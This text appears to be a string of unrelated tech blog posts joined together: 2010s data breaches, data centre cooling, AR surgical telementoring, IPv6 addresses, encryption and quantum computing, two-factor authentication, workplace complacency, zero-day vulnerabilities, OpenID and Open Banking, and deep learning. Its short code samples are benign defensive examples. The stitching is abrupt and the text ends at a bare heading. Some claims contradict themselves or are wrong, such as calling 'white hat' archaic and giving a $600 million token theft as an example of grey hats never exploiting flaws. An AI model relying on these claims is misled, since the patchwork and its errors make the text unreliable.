Today is “Data Privacy Day” – and while it seems like there is a day for nearly everything we hold dear (hello national grilled cheese day!), this particular date commemorates the 1981 signing of the first legally binding international treaty on data protection.
Data protection standards have come a long way since 1981, especially in the last couple of years with GDPR and CCPA – two regulations that extend the rights of individuals to better control and protect the use of their personal data in the evolving digital landscape. It’s generally believed that GDPR and CCPA are laying the foundation for further groundbreaking regulations.
And it makes sense. According to Business Insider, “of the 15 largest data breaches in history, 10 took place in the past decade.” These breaches collectively resulted in the loss of nearly 4 billion records. So, as we embark on a new decade, let’s take a look at some of the data breaches of the 2010s that helped shape stricter consumer data protection.
Uber Breach – While it was disclosed in 2017, Uber suffered a breach in 2016 that exposed personal information belonging to 57 million drivers and customers. Attackers stole names, email addresses and phone numbers and demanded a $100,000 ransom. To add insult to injury, Uber was also fined nearly $150 million for not disclosing the breach earlier.
Lesson Learned? Don’t embed credentials in code. Uber’s data was exposed because AWS access keys were embedded in code that a third-party contractor had stored in an enterprise code repository; anyone who could read the code could read the keys.
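To make the safer pattern concrete, here is a minimal Python sketch, assuming the boto3 AWS SDK; the environment variable names follow AWS conventions, but the setup is illustrative rather than a reconstruction of Uber’s code:

```python
import os

import boto3  # assumes the AWS SDK for Python is installed

# BAD: hardcoded keys travel with every copy of the repository.
# s3 = boto3.client("s3", aws_access_key_id="AKIA...", aws_secret_access_key="...")

# BETTER: read credentials from the environment (or omit them entirely and let
# the SDK resolve an IAM role), so nothing secret is ever committed.
s3 = boto3.client(
    "s3",
    aws_access_key_id=os.environ["AWS_ACCESS_KEY_ID"],
    aws_secret_access_key=os.environ["AWS_SECRET_ACCESS_KEY"],
)
```

Pairing this with automated secret scanning on the repository catches the cases where a key slips through anyway.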
Equifax Breach – Several tech failures in tandem – including a misconfigured device scanning encrypted traffic and an automatic scan that failed to identify a vulnerable version of Apache Struts – ultimately led to a breach that impacted 145 million customers in the US and 10 million UK citizens.
Lesson Learned? Get security basics right. Despite cyber attacks becoming more targeted and damaging, organizations are frequently still ignoring the security basics. Patches need to be applied promptly and security certificates need to be maintained. This breach also inspired elected officials to push for legislation to tighten regulations on what protections are required for consumer data and influenced an increase in executive accountability.
Facebook’s Cambridge Analytica Breach – Cambridge Analytica, a British political consulting firm, harvested the personal data of millions of people’s Facebook profiles without their consent and used it for political advertising purposes. The scandal finally erupted in March 2018 when a whistleblower brought this to light, and Facebook was fined £500,000 (US$663,000), the maximum fine allowed at the time of the breach.
Lesson Learned? Protect user data (or pay up). Lawmakers claim Facebook “contravened the law by failing to safeguard people’s information” – and suffered the consequences. Now the United States Congress is placing additional pressure on Facebook to stop the spread of fake news, foreign interference in elections and hate speech (or risk additional, larger fines).
Ecuador Breach – Data on approximately 17 million Ecuadorian citizens was exposed due to a vulnerability on an unsecured AWS Elasticsearch server where Ecuador stores some of its data. While the sheer scale of this breach made headline news, the breadth of exposed information really made everyone stand up and take notice. Exposed files included official government ID numbers, phone numbers, family records, marriage dates, education histories and work records. In addition, a similar Elasticsearch server exposed the voter records of approximately 14.3 million people in Chile, around 80% of its population.
Lesson Learned? Adhere to the shared responsibility model. Most cloud providers operate under a shared responsibility model, where the provider handles security up to a point and, beyond that, it becomes the responsibility of the customer. As more and more government agencies look to the cloud to help them become more agile and better serve their citizens, it’s vital they continue to evolve their cloud security strategies to proactively protect against emerging threats – and reinforce trust among the citizens who rely on their services.
Desjardins Breach — The data breach that leaked info on 2.9 million members wasn’t the result of an outside cyber attacker, but a malicious insider – someone within the company’s IT department who decided to go rogue and steal protected personal information from his employer.
Lesson Learned? Be proactive in identifying unusual or unauthorized behavior. While insider threats can be more difficult to identify, especially in a case where the user has legitimate privileged access rights, it’s important to be able to consistently monitor for unusual and unauthorized activities. Even more critical is the ability to automatically remediate potentially risky behavior (think: putting a temporary hold on permissions) to help reduce the amount of time it takes to stop an attack and minimize data exposure. This breach showed that a defense-in-depth security strategy that includes privileged access management, multi-factor authentication and database activity monitoring has never been more crucial.
These incidents are just a small sample of the numerous data breaches that occurred in the 2010s. Any organization that collects or stores customer information can learn from these incidents and the many more like them. Not prioritizing data protection or simply doing the bare minimum can lead to regulatory non-compliance fines, or worse – the destruction of customer confidence and brand damage. Listening to the lessons of the past can help us prepare for a more secure future.
Efficient and effective data centre cooling technologies boost sustainability
Digital services have rapidly become the backbone of any business. Nowadays, businesses rely on computing resources such as searches, data transfer, SQL queries and delivery of computing services to sustain, grow and improve customer experience. Millions of business customers are performing these tasks all over the world, often at the same time. Running all of these IT servers requires a considerable amount of power, and the heat produced is enormous. For perspective, think about your own computer: its components can get so hot that you can’t touch them, which is why internal fans must constantly disperse the heat. Multiply that across numerous server rooms with aisle after aisle of machines, and the heating problem becomes significant.
How to cool the servers effectively
To function optimally, servers need to be cooled at all times. Failure to manage airflow and heat in a data centre can lead to disastrous effects. By definition, a cooling system regulates a number of parameters in a modern data centre, such as temperature, energy use, cooling performance, and fluid flow characteristics, to achieve maximum efficiency.
- With proper and effective cooling technologies, equipment in a data centre will stay online. Overheating can damage the servers, leading to knock-on effects for the data centre itself and business customers.
- While data may not travel faster in cooler rooms, it certainly travels faster than it would over crashed servers. Because data centres can develop hot spots, efficient cooling technologies can change the way cold air is utilised in the data centre. Overall, this enables greater efficiency in scaling up a data centre.
- Data centre equipment that constantly overheats normally fails before it reaches its expected end of life. Therefore, an efficient cooling technology such as liquid immersion starts paying off immediately: hardware submerged in a dielectric liquid is predicted to last up to 40% longer, so the business will spend relatively less on replacing infrastructure. With this incentive, a business should strive to move towards green IT solutions rather than adding to the electronic waste that comes with the constant replacement of data centre infrastructure.
Data centre cooling concerns
Data centre cooling has a significant impact on the planet and therefore on business. First, the cost of installing cooling infrastructure (air-conditioning units, condensers, compressors, evaporators, and humidifiers) can be quite prohibitive. Secondly, the amount of energy needed to run these units and the IT servers is enormous, meaning businesses have to spend a considerable amount on power bills. And because most of that power is still generated from fossil fuels, the increased demand for energy also increases the carbon footprint of IT systems.
However, there is hope. Tackling the energy and cooling requirements of a data centre can be addressed by the adoption of renewable energy coupled with efficient data centre cooling technologies such as liquid immersion cooling.
Data centre cooling is an important component in digital transformation. When done effectively, it significantly reduces the IT sector’s carbon footprint. Businesses should use effective cooling technologies to ensure the sustainable use of digital services.
A new tech from Purdue U. and Indiana University School of Medicine will guide docs with AR instructions.
Scientists working together at Purdue University and the Indiana University School of Medicine have come up with a new augmented reality based technology designed to assist military surgeons to complete vital procedures on the battlefield.
The tech will offer them guidance through both visual and audio assistance from remote specialists.
The idea is to use more than just verbal instructions when these military surgeons are coping with challenging trauma cases. There are already systems that let a physician located far away mark up video sent from a surgeon who is working on a patient, but the current method has drawbacks. For example, though the video is from the perspective of the surgeon actually conducting the procedure, the notes from the assisting remote surgeon are displayed on a nearby monitor. This requires the operating surgeon to continually look away from the patient to the screen where the instructions are shown. This new augmented reality based technology could change that.
The System for Telementoring with Augmented Reality (STAR) displays the information before the surgeon’s eyes.
It provides more than notes made on a video screen. Instead, it offers a more natural way of sharing information between two doctors who are on different parts of the planet. The AR overlay lets the remote specialist display notes or mark specific points on the patient’s anatomy so that the operating surgeon sees them over his or her view of reality instead of on a screen.
This augmented reality technology uses several visual recognition algorithms to make sure the text remains stable above the applicable locations, even if the surgeon’s view shifts away from the field where the text applies. The system places a transparent overlay on top of the working field so that a remote surgeon can point things out and add text right in front of the operating surgeon’s eyes, without ever requiring the surgeon to look away from what he or she is doing.
NSA Day of Cyber
October 29, 2015
STEM education has become a national priority, and the explosive growth of cyber-related careers is creating an unprecedented opportunity for our future generation. With hundreds of thousands of cyber jobs currently open in banking, mobility, healthcare and government, cyber is one of the fastest growing STEM career fields. Education leaders are focused on how to bring cyber into their classrooms to connect these opportunities to their students.
The NSA Day of Cyber is designed to raise the “national IQ” for STEM and CyberScience education paths. NSA is sponsoring the program to introduce more than 40 million students in schools and colleges to STEM careers and inspire them to build the skills that will open up their future and connect them to this in-demand digital workforce.
The NSA Day of Cyber is a web-based, self-paced, interactive experience that enables students to test drive their future in Cybersecurity by experiencing a day in the life of six NSA cybersecurity leaders.
This online experience is free to students, teachers, schools and organizations in the United States.
v6 Vertex – A Brief Explanation of IPv6 Address Types
ITdojo’s v6 Vertex is an ever-expanding set of quick tips and useful advice for using IPv6 in your network.
People who have been using IPv4 for some time know that there are three basic address types that are commonly discussed: unicast, broadcast and multicast.
When it comes to address types IPv6 offers us some of what we already know and then takes things a step further. In this article I offer a quick, concise explanation of each IPv6 address type.
IPv6 Address Type #1: Unicast
The concept of a unicast in IPv6 is unchanged compared to what you already know in IPv4. A unicast address in either protocol is used for one-to-one communication. In theory, a unicast IP address represents one and only one destination (yes, there are exceptions). Put simply, when you want to get some traffic to a specific node (and only that specific node) you send it to that node’s unicast IP address. Again, this is true in IPv4 and in IPv6.
IPv6 Address Type #2: Multicast
The core concept of a multicast IPv6 address is the same as it was in IPv4. The devil is in the details, though. A lot of thought went into IPv6 multicasting and it has an impressive role in the inner workings of the protocol. A multicast, which is generically defined as “one-to-many” communication, is when a node sends traffic to a multicast IP address rather than to a unicast IP address. The traffic is delivered to as few as zero and as many as all nodes in an internetwork; in reality, it is sent to some number in between. If you know multicasting (even a little bit) in IPv4, you are on a solid foundation to learn how multicasting works in IPv6. Despite having an expanded role in the new protocol, a multicast is still just a multicast.
IPv6 Address Type #3: Anycast
I was just as surprised as a lot of people to learn that anycast IP addresses, which I heard about for the first time when I started learning about IPv6 waaaaaaaaaayyyy back in 1999, are not new. They have quietly existed in IPv4 for a long time, too. They just never got any real publicity. An anycast IP address is the “closest one of many”. This means that many nodes will be configured with the same anycast IP address and your traffic will be sent to the one that is closest to you (from a routing protocol metric perspective). This is pretty exciting stuff. The first thing it does is create an opportunity to eliminate lists of failover servers for certain services. DNS is at the top of the list for this discussion. Many nodes in today’s networks are configured with multiple DNS server IP addresses. The node always sends queries to the first on the list and only goes to the next DNS server on the list if the first doesn’t respond in a timely fashion. The most important base word in that last sentence was ‘time’. It takes time for the failover to occur, which diminishes the user experience. By having all of your DNS servers share the same anycast IP address (which they have IN ADDITION TO their unicast IP address) you can configure your nodes with one DNS server IP address (the anycast address). Now, when nodes query the server their packets are forwarded to the closest (from the router’s perspective) node with that address. Assuming all the DNS servers have the same capabilities (zone files, recursion capabilities, etc.) the user will get the service they need without ever having to fail over to another server. Well, in the eyes of the node, at least. This has the promise of producing very seamless and transparent services for users. There are details that I’m overlooking (this is supposed to be brief), of course. But the opportunities for anycasting in IPv6 are pretty cool. Note: The f-root name server on the Internet is an anycast IPv4 (yes, IPv4) address. It is also available via an IPv6 anycast address, too.
Did you notice that I never mentioned broadcasts? Broadcasts as you know them in IPv4 are gone in IPv6. You can, however, still reach all nodes. The functionality of a broadcast has been absorbed (quite correctly) into multicasting. We now have an all-nodes multicast address (achieves pretty much the same thing as a broadcast), an all-routers multicast address, an all-DHCP servers multicast, etc. Rather than broadcasting for a DHCP server like you did in IPv4 you now multicast for one. A partial list of well-known multicast IPv6 addresses can be seen here.
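To make the distinction concrete, here is a small sketch using Python’s standard ipaddress module. Note that an anycast address is syntactically indistinguishable from a unicast address, so no library can identify one by inspection alone:

```python
import ipaddress

examples = {
    "2001:db8::1": "unicast (2001:db8::/32 is reserved for documentation)",
    "ff02::1": "multicast, all-nodes (the closest thing to an IPv4 broadcast)",
    "ff02::2": "multicast, all-routers",
    "fe80::1": "link-local unicast",
}

for addr, label in examples.items():
    ip = ipaddress.IPv6Address(addr)
    print(f"{addr:<12} {label}")
    print(f"    is_multicast={ip.is_multicast}  is_link_local={ip.is_link_local}")
```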
Quantum Computing One of the ’12 Dark Secrets of Encryption’
(CIO.com) Encryption is fast becoming developers’ go-to solution for data privacy and security challenges. Contributing Editor Peter Wayner cautions that encryption has its limits, and the tricky thing with encryption is that it can be impossible to be certain where those limits are.
Wayner posits “12 dark secrets of encryption,” with quantum computing holding one of the secrets. Quantum is a secret, Wayner says, because “the future of computing is a mystery.”
“No one knows if quantum computers will ever be built with enough power to tackle meaningful problems, but we know people are trying and putting out press releases about making progress. We also know that if the quantum machines appear, some encryption algorithms will break right open. Many encryption scientists are working hard at building new algorithms that can resist quantum computers, but no one really knows the extent of a quantum computer’s powers. Will it be limited to the known algorithms? Or will someone find another way of using the quantum computer to break all of the new algorithms.”
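To see concretely why factoring power matters, consider this toy RSA sketch with deliberately tiny primes (real keys use primes hundreds of digits long; Shor’s algorithm on a sufficiently large quantum computer could factor those efficiently, which is the kind of break Wayner describes):

```python
# Toy RSA for illustration only; requires Python 3.8+ for pow(e, -1, m).
p, q = 61, 53
n, e = p * q, 17                     # public key: n = 3233, e = 17
d = pow(e, -1, (p - 1) * (q - 1))    # private exponent; deriving it needs p and q

message = 42
cipher = pow(message, e, n)          # anyone can encrypt with the public key
assert pow(cipher, d, n) == message  # only the private key holder can decrypt

# An attacker who can factor n recovers the private key outright:
p2 = next(k for k in range(2, n) if n % k == 0)
d2 = pow(e, -1, (p2 - 1) * (n // p2 - 1))
assert pow(cipher, d2, n) == message
```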
Wayner’s provocative article is worth a read for the other 11 dark secrets.
Two Factor Authentication
Social engineering, or basically tricking someone into giving you their password, is one of the most common methods of cybercrime. This is often done by sending a familiar looking email (e.g., from Bank of America) with a link in it that the user inadvertently clicks on before typing in their password. Do this and the bad guys have you, right? Well, not necessarily. Increasingly, websites require users to utilize two factor authentication, which will prevent this nightmare scenario.
I find the simplest definition of two factor authentication to be “something you know and something you own”. A password is clearly “something you know” (assuming you don’t forget it) and the second factor is “something you own”. This must be something physical that is only in your possession and nearly impossible for someone else to emulate. In the past this was often a digital fob or token – a dedicated piece of hardware that would generate a random code. Nowadays, however, those are a relic of the past and the preferred “something you own” is a cell phone. Almost everyone has had the experience of a website texting them a code that they have to enter to authenticate. That is our modern-day version of two factor authentication.
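SMS codes are generated on the provider’s side, but the same “something you own” idea powers authenticator apps through the open TOTP standard (RFC 6238). Here is a minimal sketch using only Python’s standard library, with a made-up demo secret:

```python
import base64
import hashlib
import hmac
import struct
import time

def totp(secret_b32: str, interval: int = 30, digits: int = 6) -> str:
    """Compute the current one-time code from a shared secret (RFC 6238)."""
    key = base64.b32decode(secret_b32, casefold=True)
    counter = struct.pack(">Q", int(time.time()) // interval)  # time-step number
    digest = hmac.new(key, counter, hashlib.sha1).digest()
    offset = digest[-1] & 0x0F                                 # dynamic truncation
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

print(totp("JBSWY3DPEHPK3PXP"))  # demo secret; phone and server derive the same code
```

Because both sides derive the code from a secret stored on the device, the phone really is the “something you own”.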
If you want to learn more about how Accolade Technology can help your business, please contact us at [email protected].
How can complacency harm our safety?
EHS safety expert and Head of Marketing for SafeStart International, Lucas Martinucci offers tips on how to not let complacency badly affect our daily lives on and off the workplace.
Before we start, it is important for you to understand what complacency is. So what is complacency? Complacency gives you a false sense of security/safety or confidence. It makes you let your guard down even around potential danger. We all become complacent with the hazards we have to deal with on a day to day basis. Once you get used to the way things are, it’s hard to treat the hazards with the same fear, apprehension and respect you did initially. Once things seem normal to you it’s easy enough for anybody’s mind to wander.
To give you an example, we all have picked up our cell phone while driving or texted while crossing a street despite knowing that it could potentially be dangerous. Even though we have come across fatalities and accidents that have happened to people while they were texting or calling, we have done it again and again. Why? Because “nothing has ever happened before” to us or to anyone that is close to us. This is complacency.
“More than 90% of accidents that happen, whether at work, at home or on the road, can be avoided. Complacency, or as we usually explain as overconfidence, is one of the main causes of accidents, but still, it is a state very difficult to recognize because we think we are safe doing something that we are used to do on a daily basis”, explains Lucas Martinucci, Safety specialist and Head of Marketing at SafeStart International.
“Safety is ‘at risk’ when we reduce our perception of danger, when we deviate our behaviour, take short-cuts or do not follow the rules because ‘it never went wrong’ or ‘I’ve always done it that way’. Also, when we believe that we don’t need to improve, because we are already good enough at what we do, we let our guard down making us more susceptible to silly mistakes”, adds Martinucci.
Lucas offers some tips on how to avoid being complacent:
Turn off the autopilot mode! When you feel that complacency is slowly creeping in, improve your habits, keep your eyes on task and look at others for the patterns that increase the risk of injury. This will help you to not repeat the same behaviours and errors;
Rate your State! It is very important to be aware that we do not know everything and we are not superheroes. Do a self-analysis: How am I feeling today? What errors do I really make everyday? What errors are real risks to my life and what can I do to avoid them?;
Anticipate your next moves to avoid possible errors! This should become a habit in everyone’s life – stay alert when you go on with your day, in traffic, at work, in public places. Excessive zeal is never harmful;
And finally, ask for help! “When I saw that I was picking up my cell phone a lot while driving, I asked my wife and kids to warn me or even yell at me. Everything is easier with a bit of help. Do the same with your family, co-workers, friends,” says Lucas.
SafeStart is a leader in advanced safety awareness training with presence in more than 60 countries, having trained more than 4 million people in over 3,500 companies. The training is available in more than 30 languages and has been implemented in more than 60 countries. The focus of the training is to develop specific skills to reduce errors, injuries and incidents that happen daily and involve human factors. Among the companies that implemented the programme are: Komatsu, Mosaic, Saint Gobain, DSM, Epiroc, Etex, Heineken, Michelin, Outokumpu.
You may not think twice about the software you use to run your computers and devices, but behind the interface is highly complex code that may have taken a large team of developers years to write and finetune. Despite their best efforts, developers can miss software flaws. While some flaws only affect user experience, others are far more serious.
A zero-day flaw is any software vulnerability exploitable by hackers that doesn't have a patch yet. The software developers may not know of the weakness, may still be developing a fix for it, or may be ignoring it. As you can imagine, such a vulnerability can result in a critical cybersecurity breach.
Why is it called zero-day?
Many people want to know why experts call this type of computer exploit a zero-day vulnerability rather than anything else. Admittedly, there’s a bit of sarcasm behind the name. People in the computing world refer to it as a zero-day attack — because the software creators have zero days to respond after hackers have taken advantage of it. It’s sort of like shutting the barn door after the wolf has already been inside. Sure, you can prevent future attacks, but that's of little comfort to the missing sheep.
After the zero-day vulnerability is made public, it’s no longer a zero-day flaw — it’s just a vulnerability. Usually, manufacturers will burn the midnight oil to develop a patch to fix the weakness as soon as they know about it.
How are zero-day bugs discovered?
With manufacturers working overtime to minimize vulnerabilities, you'll notice your software updates pretty regularly. Sometimes security updates even release on the same day as the software debuts. While developers like to find security holes internally, they also don’t mind some outside help.
White hat hackers
White hat hacker is an archaic term for an ethical hacker. Companies hire such specialists to enhance network security. Identifying potential zero-day bugs can be part of the job.
Grey hat hackers
Grey hat hackers are like white hats, except they're not working in an official capacity. Such hackers may try to find zero-day bugs in hopes of landing a job with the company, gaining notoriety, or just for entertainment. A grey hat hacker never takes advantage of any flaws they discover. An example is when a hacker exploited a vulnerability in the cryptocurrency platform Poly Network to take $600 million worth of tokens before returning the sum.
Bug bounty hunters
Many software companies host hacking events and pay hackers cash and prizes for finding exploits. Here, hackers find flaws in operating systems, web browsers, and apps for mobile devices and computers. A recent example of this is when two Dutch security specialists took home $200,000 for a Zoom zero-day discovery at Pwn2Own.
Security researchers
Researchers from cybersecurity companies like Malwarebytes look for exploits as part of their job. When researchers find an exploit before cybercriminals, they usually report it to the manufacturers before making it public. By giving manufacturers a head start, researchers can minimize the chances of hackers launching zero-day attacks.
How are zero-day attacks discovered?
A software user realizes that they’re the target of a zero-day attack when their system behaves unusually or when a hacker uses the exploit to drop threatening malware like ransomware. Researchers can also uncover a zero-day attack after an event. For example, after the state-sponsored Stuxnet attack on Iran, researchers worldwide realized it was a zero-day worm attack. Sometimes, a zero-day attack is recognized by a manufacturer after a client reports unusual activity.
Are zero-day attacks common?
Zero-day attacks like the Stuxnet worm strike have specific targets and don’t affect regular computer users. Meanwhile, reputable companies like Microsoft, Apple, and Google usually fix zero-days as soon as possible to protect their reputations and their users. Often, a fix is out before the average user is affected. Still, zero-days shouldn’t be taken lightly because their impact can be seriously damaging.
How does a zero-day attack happen?
- Identification: Hackers find unreported vulnerabilities in software through testing or by shopping on black markets in the underbelly of the Internet like the Dark Web.
- Creation: Threat actors create kits, scripts, or processes that can exploit the newly found vulnerabilities.
- Intelligence: The attackers already have a target in mind or use tools like bots, probing, or scanners to find profitable targets with exploitable systems.
- Planning: Hackers gauge the strength and weaknesses of their target before launching an attack. They may use social engineering, spies, or any other tactic to infiltrate a system.
- Execution: With everything in place, the attackers deploy their malicious software and exploit the vulnerability.
How to mitigate zero-day attacks
Stopping attackers from exploiting unknown vulnerabilities to breach your system is undoubtedly challenging. It’s critical to close the threat vectors a threat actor can use to infiltrate your network, using layers of protection and safer practices. Here are some tips that may help you detect and prevent unknown threats:
- Don’t use old software. Hackers can more easily create exploits for software that the vendor no longer supports.
- Use advanced antivirus tools that feature machine learning, behavioral detection, and exploit mitigation. Such features can help your cybersecurity tools stop threats with unknown signatures.
- In companies:
  - Train employees to identify social engineering attacks like spear-phishing that hackers can use as an attack vector.
  - Adopt Endpoint Detection and Response (EDR) solutions to monitor and secure your endpoints.
  - Enhance network security with firewalls, private VPNs, and IPsec.
  - Segment your networks with robust network access controls.
News on zero-days
- Log4j zero-day “Log4Shell” arrives just in time to ruin your weekend
- Windows Installer vulnerability becomes actively exploited zero-day
- Patch now! FatPipe VPN zero-day actively exploited
- Patch now! Microsoft plugs actively exploited zero-days and other updates
- Google patches zero-day vulnerability, and others, in Android
- Patch now! Apache fixes zero-day vulnerability in HTTP Server
- Update now! Google Chrome fixes two in-the-wild zero-days
- Apple releases emergency update: Patch, but don’t panic
- HiveNightmare zero-day lets anyone be SYSTEM on Windows 10 and 11
- PrintNightmare 0-day can be used to take over Windows domain controllers
- Microsoft fixes seven zero-days, including two PuzzleMaker targets, Google fixes serious Android flaw
- Zoom zero-day discovery makes calls safer, hackers $200,000 richer
Digital identity is data about you: who you are, what you’ve agreed to, and who you trust. Some people even argue that your digital identity includes everything you say and do online. According to our guest, Nat Sakimura, this isn’t far from the truth.
Nat is considered one of the foremost global experts on the subjects of identity and privacy. He’s known for his work at both the OpenID Foundation as chairman of the board and the Nomura Research Institute as an identity and privacy standardization architect.
In his over 30-year career, Nat has penned some of the world’s most widely used open data standards and strives to help communities understand and organize themselves around innovative ideas of identity and privacy.
What is digital identity?
For Nat, the essence of digital identity is a set of attributes about any entity. When this entity is a living, breathing human being, that identity is also known as personal data.
“As long as it is actual data that can be linked back to a single individual, we treat it as personal data.”
Some would say “personal data” is a bit of an oxymoron. They feel that it inherently wants to be free and there is no such thing as personal data at all.
Nat argues that those perceptions of data are viewing “personal” as something possessive. In reality, personal data is simply data that can be linked back to a person in any way.
Interestingly, Nat uses the term “linked back to” as opposed to “owned.” A lot of dialogue around personal data comes back to this word: ownership. However, Nat says that data cannot legally be owned. You can’t establish a property rights type of ownership over information, because it can be copied.
This is where a dichotomy comes into play. The difference between data and property is that the more you copy and paste data, the more valuable it becomes, unlike property, which is gone once you use it.
Our structures of laws and rights are built around this zero-sum structure. For example, we can’t both own a piece of land or a piece of property. But when it comes to data, it isn’t that simple. Nat explains:
“It’s more like copyright. So, you have copyright, and you have economic rights around it, as well. And the music, for example, can be copied many times. But the value of the music itself doesn’t diminish.”
Since your personal data is linked to you, you should have certain rights. This includes an economic right to any value generated by that data, just like an author or songwriter would have economic rights to the data they’ve created. However, at the heart of all the data we create every day remains this core of identity.
OpenID’s identity layer
Nat has spent decades trying to solve the difficult problem of how best to maintain an identity in a digital world. He and his colleagues at the OpenID Foundation are creating a new layer of the Internet — an identity layer — which will underpin all of our digital identities well into the future.
“It’s a technical facility which allows an individual, as well as corporations and governments, to manage how their attributes are being transferred or expressed to another party.”
Since our personal data is distributed all through the internet, the OpenID protocol gives us a way to bring it all back together under one common identity and create a single view of our distributed data.
This is where Open Banking comes in. The fact is, we rightly expect a certain degree of protection when it comes to our money. That’s why the standards created by the OpenID Foundation are so crucial to Open Banking efforts around the world, defining how customers are identified and how they agree to securely share their financial data.
Within the OpenID Foundation is the Financial Grade API (FAPI). This group is working on the high-level security protocols for identity transactions. Today, FAPI is being adopted as a de facto security standard in the open banking world, specifically in places like the UK and Australia. The bottom of the security stack is the base on which OpenID is built: OAuth 2.0. Nat explains:
“OAuth 2.0 is a framework that allows you to delegate access to an API. It’s like creating a special purpose key for the safe so that a person can only perform that action.”
The next layer in the security stack is OpenID Connect. It builds on OAuth 2.0 to create a protocol that allows a party to express who the user is to the other party.
The layer above OpenID Connect is FAPI. OpenID Connect provides various levels of security, but elaborate security measures can become overkill for most consumers. FAPI constrains all of those measures to the option that can support the highest security scenario.
Recently, another layer was added to the stack called Client Initiated Backchannel Authentication (CIBA). This layer deals with cases where the user is not online directly.
Between all of these technologies, OpenID offers a way to authorize and authenticate in a distributed manner. No matter the service being used, it’s always adopting the same standards and mechanisms. Plus, those mechanisms are secure.
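As a rough sketch of how the bottom layers fit together in practice, here is what building the first leg of an OpenID Connect authorization code flow can look like in Python. The issuer, client ID, and redirect URI are hypothetical placeholders, not real endpoints:

```python
import secrets
from urllib.parse import urlencode

ISSUER = "https://id.example-bank.com"  # hypothetical OpenID provider
CLIENT_ID = "my-fintech-app"            # hypothetical registered client

def authorization_request_url() -> str:
    """Build the URL the user visits to authenticate and consent."""
    params = {
        "response_type": "code",             # OAuth 2.0 authorization code grant
        "client_id": CLIENT_ID,
        "redirect_uri": "https://app.example.com/callback",
        "scope": "openid accounts",          # 'openid' upgrades OAuth 2.0 to OIDC
        "state": secrets.token_urlsafe(16),  # ties the callback to this request
        "nonce": secrets.token_urlsafe(16),  # binds the returned ID token to it
    }
    return f"{ISSUER}/authorize?{urlencode(params)}"

print(authorization_request_url())
```

FAPI then narrows the choices this flow leaves open, for example by requiring stronger client authentication and signed request objects.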
The efforts of the OpenID Foundation have become critical to the success of Open Banking around the world. The stack we explored, made up of OAuth 2.0, OpenID Connect, FAPI, and CIBA, is now the gold standard for Open Banking readiness, putting Nat and his team right at the center of the action.
With these standards, banks can build powerful ways to track consent, using well-defined technical constructs like claims and grants to manage securely who has agreed to share what data with whom.
Standardizing digital identity
How is identity to be managed in such a fragmented and distributed way? Realistically, the world is still figuring that out, as banks, governments, and giant tech companies all vie to become your favorite, and perhaps only, identity provider.
If you look around the world, different countries are taking different approaches to this question of managing identities for their populations. Nat feels that moving to national identity schemes won’t protect people from privacy invasions.
“The privacy violation comes from the use of the data. Just replacing the privately run identities system with a government-run identity system doesn’t change the situation. In some cases, many people fear that having too much data accumulated makes the government even more dangerous than having that data in a private company.”
That is certainly the case in many places. People trust their governments even less than they trust social media networks. Unfortunately, the current situation feels like a choice between trusting our government with our identities or trusting social media giants and other private digital providers with our identities.
Nat suggests that standardizing digital identity can ensure identity providers all operate on the same interface. That way, it will cost less. But what does this mean in the context of Open Banking?
Open Banking and digital identity
One of the advantages of cash is its ability to support anonymous transactions. Many of those who lament Open Banking worry that the government or the corporation is going to see all of their banking activity. They want their transactions to remain anonymous.
Nat says there is a way to maintain the anonymity of cash in a digital world. You can use a wallet system that holds anonymous digital money. However, if you lose that device, just like if you lost cash, the money is gone.
Regardless, Nat sees Open Banking as an effective lever to help drive adoption and education of identity management and consent management. He explains:
“Whether you like it or not, if you start using the banking services in the Open Banking context, you will be exposed to that framework and people will learn to think in concrete actions much better than in the abstract.”
And if you still trust no one, there are more solutions. Take self-sovereign identity, for example. Nat explains:
“Self-sovereign identity is a concept which allows you to maintain your internet identity that is created by yourself and will not be thus revoked by any party.”
It almost seems like everyone should move towards some form of self-sovereign identity. However, Nat says the important thing to remember is that you are still not the authoritative source of your data. Other parties can retain control over your data.
Nat says you might have to doubt if your own name even belongs to you. In reality, the government is the authoritative source of your name. This can make it feel like identity diffuses into almost nothing. Nat sees it in another way.
“Identity is not diffusing. Identity is a constant, which can only be instantiated with a relationship and with a point in time. Identity is an abstract notion, which only gets embodied in a particular context.”
Digital identity is key to making Open Banking work
Who are you? What makes you, well, you? Capturing our digital identity — the official expression of who we are online — demands that we claim certain data as our own, while still being able to share it with others.
Meeting this seemingly impossible challenge is the work of the OpenID Foundation. The standards they create, including OpenID Connect, FAPI, and CIBA, help answer these philosophical questions in a way that code can understand.
Using their technical constructs of grants and claims, we can begin to capture the consent to share data in a strong, reliable, and meaningful way.
No group has embraced these new standards more so than the global Open Banking community. The reason is clear: Open Banking is wholly dependent on digital identity.
Without some mechanism to track and verify people’s identity, the whole notion of a common, Open Banking ecosystem falls apart. At the same time, digital identity efforts are useless without something practical for them to do. The truth is, Open Banking and digital identity need each other to succeed.
Real or fake?
But is identity even real? Is it a specific thing that you can point to? According to Nat, not really.
Identity only becomes visible under the lens of a particular context. Your identity towards your family, your bank, and your government are all different. Yet, all are valid and all are real. Your identity belongs to you, but can only be seen through the eyes of others. How this comes to be in the digital world remains a work in progress.
Listen to the full podcast episode and subscribe via your favorite player.
Visit Mr. Open Banking @ http://mropenbanking.com.
If you missed the first season of the podcast, discover it here.
The hype around deep learning
Deep learning is all the rage today, as companies across industries seek to use advanced computational techniques to find useful information hidden across huge swaths of data. While the field of artificial intelligence is decades old, breakthroughs in the field of artificial neural networks are driving the explosion of deep learning.
Decade old ideas now work
Attempts at creating artificial intelligence go back decades. In the wake of World War II, the English mathematician and codebreaker Alan Turing penned his definition for true artificial intelligence. Under this criterion, dubbed the Turing Test, a conversational machine would have to convince a human that he was talking to another human. It took 60 years, but a computer finally passed the Turing Test back in 2014, when a chat bot developed by the University of Reading dubbed “Eugene” convinced 33% of the judges convened by the Royal Society in London that he was real. It was the first time that the 30% threshold had been exceeded. Since then, the field of deep learning and AI has exploded as computers get closer to delivering human-level capabilities. Consumers have been inundated with an array of chat bots like Apple‘s Siri, Amazon‘s Alexa, and Microsoft‘s Cortana that use natural language processing and machine learning to answer questions.
Understanding and Neural Networks
